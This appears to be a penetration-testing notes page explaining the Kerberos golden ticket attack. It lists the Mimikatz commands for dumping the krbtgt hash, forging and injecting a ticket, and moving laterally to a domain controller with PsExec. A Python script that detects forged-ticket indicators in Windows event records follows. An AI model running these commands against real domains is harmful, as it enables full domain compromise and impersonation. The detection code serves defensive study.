# Golden ticket attack

## Golden Ticket attack

Going back to the explanation of Kerberos authentication, we recall that when a user submits a request for a TGT, the KDC encrypts the TGT with a secret key known only to the KDCs in the domain. This secret key is actually the password hash of a domain user account called krbtgt. If we are able to get our hands on the krbtgt password hash, we can create our own custom TGTs, known as golden tickets.

1. mimikatz.exe
2. privilege::debug
3. lsadump::lsa /patch\
   to get the **krbtgt** NTLM hash
4. kerberos::purge
5. kerberos::golden /user:\<fakeuser> /domain:\<domain> /sid:\<sid> /krbtgt:\<krbtgt ntlm hash> /ptt
6. misc::cmd
7. psexec.exe \\\\\<dc\_machine> cmd.exe\
   With the golden ticket injected into memory, we can launch a new command prompt with misc::cmd and again attempt lateral movement with PsExec.
8. whoami
9. whoami /groups for verification
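
A defender-side check for the forged-ticket behaviour described above, added here as an example and not part of the original page: it scans Windows Security event records for service-ticket requests (4769) and logons (4624) whose account never received a TGT (4768) from the KDC, or whose account name does not exist in the domain, which is exactly what a golden ticket minted offline with the krbtgt hash and a /user:\<fakeuser> principal produces. The event IDs are real; the record layout, sample events and account list are constructed for the example.

```python
# Added example (not from the original page): flag indicators of a forged
# TGT (golden ticket) in simplified Windows Security event records.
# A golden ticket is minted offline with the krbtgt hash, so no KDC ever
# logs a 4768 (TGT issued) for it; the first thing a DC sees is a 4769
# (service ticket requested) or a 4624 logon presenting the ticket.
# Assumption: events are collected from every DC in the domain, otherwise a
# legitimate TGT issued by another DC would also look like "no prior 4768".
from collections import defaultdict

# Constructed sample events (not real log data): alice behaves normally,
# bob presents a ticket no DC issued, and "fakeuser" (the forged principal)
# requests service tickets and logs on without existing in the domain.
SAMPLE_EVENTS = [
    {"id": 4768, "account": "alice", "client": "10.0.0.5", "ts": 100},
    {"id": 4769, "account": "alice", "client": "10.0.0.5", "ts": 101},
    {"id": 4769, "account": "bob", "client": "10.0.0.7", "ts": 120},
    {"id": 4769, "account": "fakeuser", "client": "10.0.0.9", "ts": 150},
    {"id": 4624, "account": "fakeuser", "client": "10.0.0.9", "ts": 151},
]
KNOWN_ACCOUNTS = {"alice", "bob", "krbtgt"}  # constructed domain user list


def find_golden_ticket_indicators(events, known_accounts):
    """Return (reason, event) tuples for records matching two indicators:

    * a 4769 service-ticket request from a host that never obtained a 4768
      TGT for that account (a TGT injected with /ptt instead of requested);
    * a ticket or logon for an account name absent from the domain
      (the /user: value in a golden ticket need not be a real account).
    """
    known = {a.lower() for a in known_accounts}
    tgt_issued = defaultdict(set)  # account -> client addresses with a TGT
    findings = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        acct, client = ev["account"].lower(), ev["client"]
        if ev["id"] == 4768:
            tgt_issued[acct].add(client)
            continue
        if acct not in known:
            findings.append(("ticket for nonexistent account", ev))
        elif ev["id"] == 4769 and client not in tgt_issued[acct]:
            findings.append(("TGS request without prior TGT from this host", ev))
    return findings


if __name__ == "__main__":
    for reason, ev in find_golden_ticket_indicators(SAMPLE_EVENTS, KNOWN_ACCOUNTS):
        print(f"[!] {reason}: {ev}")
```

A ticket for an account name that resolves to nobody in the directory is the strongest of the two signals; the missing-4768 check also fires on benign gaps in log collection, so it is a lead to correlate, not a verdict on its own.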
